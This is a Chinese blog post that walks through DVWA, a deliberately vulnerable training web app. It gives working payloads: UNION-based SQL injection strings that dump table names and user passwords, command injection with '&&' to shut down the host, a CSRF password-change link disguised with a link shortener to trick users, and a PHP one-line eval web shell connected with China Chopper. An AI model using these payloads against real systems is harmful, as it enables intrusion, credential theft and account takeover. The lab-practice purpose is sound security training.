了解SQL注入、XSS跨站、上传漏洞的概念和基本原理。

于 2024-04-19 10:25:54 发布
阅读量562 收藏 5
点赞数 20
文章标签: sql xss 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63613566/article/details/137953468
版权

DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

一、密码登录绕过

1、打开Brute Force界面,测试登陆框是否存在注入,提交敏感字符测试程序是否报错。在登录界面上输入用户名admin’(使用敏感字符‘)。

2、仔细观察登录系统时地址栏中的sql语句,在用户名密码提交界面上通过注入逻辑语句使登录判断失效,进入受保护页面。

二、命令注入

1、打开Command Injection界面,在该界面提供一个命令行执行环境,输入ip地址返回ping命令的结果。

2、window和linux系统都可以用&&在同一行执行多条命令,尝试注入附加命令使目标主机(延时)关机。

三、 跨站请求伪造

csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。

1、打开CSRF界面,可在New password和Confirm new password处正常修改登录口令。

2、构造一个链接:

http://IP/DVWA/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change# (注意以密码修改的实际地址为准)

3、利用在线短链接生成器伪造该链接。

4、此时可诱骗其他用户点击该链接,通过伪造身份提交密码修改,直接跳转到修改密码成功的页面,成功把密码修改为123。

四、文件上传

1、建立一个PHP文件,内容为:<?php @eval($_POST['pass']);?>。

2、打开File Upload界面,将PHP一句话木马上传。

3、得到木马在服务器上的路径。

4、打开中国菜刀,把上传木马路径添加到工具上。

5、双击网址进入文件管理。(注:这里可以进行文件管理,数据库管理,虚拟终端或运行自写脚本)

五、 SQL注入

1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。

2、输入1提交,将正常返回查询结果。

3、输入1’提交,将返回一个错误。

4、猜测使用的sql语句可能是:select First name and Surname from 表名 where id='输入的id'。

5、输入1' union select 1,database()#提交,得到数据库名称。

6、输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#,得到数据库中的表名。

7、输入1' union select 1,column_name from information_schema.columns where table_name='users'#,得到users表的列名。

8、输入1' union select 1,concat(user,password) from users#,得到users表的所有用户名和密码。

你吵到我胃了959
关注
  • 20
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA网络安全靶场搭建与练习 附攻略和在线版
01-02
网络安全靶场搭建与练习附攻略和在线版
DVWA简介
live4dream的博客
10-26 4万+
DVWA是一个web安全学习靶场,集成了OWASP Top10的漏洞,用于web安全初学者练习web渗透技巧。
DVWA下载、安装、使用(漏洞测试环境搭建)教程
星如雨落
10-27 4万+
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 一共有十个模块: 暴力(破解)、命令行注入请求伪造、文件包含、文件上、不安全的验证码、SQL注入SQL盲注、弱会话ID、XSS漏洞(DOM型脚本、反射型脚本、 存储型脚本) 环境搭建 由于是本地搭建真实web漏洞,我就以Windows
DVWA使用教程(Brute Force)(一)
ai_64的博客
06-09 2万+
DVWA使用教程(Brute Force)(一) DVWA是一个用来练习Web渗透的PHP应用。共有十个模块,分别是 1.Brute Force(爆破) 2.Command Injection(命令注入) 3.CSRF(请求伪造) 4.File Inclusion(文件包含) 5.File Uplod(文件上) 6.Insecure CAPTCHA(不安全的验证码) 7.SQL...
DVWA的安装教程和通关详解
路baby的博客
11-27 3万+
DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的Web漏洞。有详细的DVWA的安装教程,和通关详解
预防XSS攻击和SQL注入XssFilter
05-19
攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于脚本攻击,黑客界共识是:脚本攻击是...
SQL注入XSS攻击安全规范1
08-08
- 对输入数据进行类型验证和长度限制,防止过长的数据可能导致的XSS漏洞。 【安全操作实践】 - 时刻保持警惕,对用户输入进行严格验证。 - 使用最新的安全框架和库,这些通常已经包含了防止SQL注入XSS的措施。 - ...
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
03-22
本文档将详细介绍极致CMS(以下简称JIZHICMS)的安全审计报告,涵盖SQL注入、储存行XSS和逻辑漏洞等多方面的安全问题。本文档将从标题和描述开始,逐步解释标签和部分内容中的知识点。 极致CMS审计报告概述 极致...
开发代码安全规范-防SQL注入XSS攻击代码编写规范.doc
07-14
其中,SQL注入XSS攻击是两个最为常见的安全漏洞类型。为了防止这些漏洞的出现,编程人员需要具备良好的安全意识和安全编程经验。下面是关于防SQL注入XSS攻击代码编写规范的详细知识点: 一、SQL注入...
DVWA全级别通关教程
热门推荐
weixin_52515588的博客
03-26 9万+
首先选择难度,我们从low开始,如上图所示进行修改 目录 SQL手工注入 过程: low Medium high Impossible SQL 盲注 过程: SQL 工具注入 工具安装过程: 过程: low Medium High: 暴力破解 过程: Low Medium High Impossible 命令注入 过程: Low Medium High: Impossible 文件上 过程: Low Medium High Im...
DVWA暴力破解(后续)
weixin_47498728的博客
05-05 5238
经过一段时间的学习,我发现之前的文章还是存在很多问题,所以连夜更新了这篇后续。 这里我爆破的是DVWA的登录界面(如图所示) 教程开始: 1.启动php 2.启动Burp Suite 3.打开测试页面(此时拦截状态显示ON,表示开启) 4.进入dvwa,网址:http://localhost/login.php 5.会发现网一直在加载,因为这个请求被拦截了,需要我们手动放行,点击Forward即可 6.来到需要暴力破解的登录界面 7.使用账号密码登录 8.会发现网一直在加载,因为又被拦截
DVWA通关攻略零到一【全】
WX公众号-小白学安全
10-28 4万+
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
dvwa使用教程
huitest的博客
02-04 1万+
2.3 启用功能 dvwa上的漏洞,需要些刻意的配置才能被利用。访问:http://172.0.0.1/dvwa如下,红色表示不能正常使用: 问题:PHP function allow_url_include:Disabled 处理:编缉/etc/php.ini将allow_url_include值由Off改为On 问题:PHP module gd: Missing 处理:yum install -y php-gd 问题:reCAPTCHA key: Missing 处理:编...
dvwa安装和使用指南
weixin_33779515的博客
01-26 2758
---------------------------------------说明本手册作为教学的一部分供大家参考。具体的关于web漏洞的学习大家可以参考《web***测试-常见漏洞解析课程》http://edu.51cto.com/course/course_id-5281.html ---------------------------------------1....
DVWA靶场教程
wxh的博客
01-15 2万+
Burt Force(暴力破解)
DVWA(Web 渗透的靶机环境)+csrf漏洞练习
net的博客
03-16 2420
用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。十个攻击模块,分别是:1、Brute Force(暴力(破解))、2、Command Injection(命令行注入)、3、CSRF(请求伪造)、4、- File Inclusion(文件包含)、5、File Upload(文件上)、6、Insecure CAPTCHA (不安全的验证码)、
xampp和dvwa环境安装(细致步骤)
m0_63078117的博客
05-06 1446
一、先准备xampp和dvwa的安装包(压缩包) xampp:官网下载地址:https://www.apachefriends.org/zh_cn/index.html dvwa:压缩包下载链接:https://github.com/digininja/DVWA/archive/master.zip打开网址后会自动下载压缩包。 二、安装xampp 运行xampp的安装包,选择yes,然后ok 然后选择Next 什么都不用修改,继续Next 然后选择安装位置,它默认选择在C
DVWA平台搭建+SQL注入实验详解
最新发布
Karka_的博客
08-15 4842
最终目的:得到爆破数据库,得到数据库中的用户名和密码,过程:1)查看页面的递方式2)判断是否存在注入注入类型是什么3)猜解SQL 查询语句中的字段数4)获取当前数据库名和基本信息5)获取数据库中的表名6)获取表中的字段名7)爆破关键字段的内容(用户名、密码)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值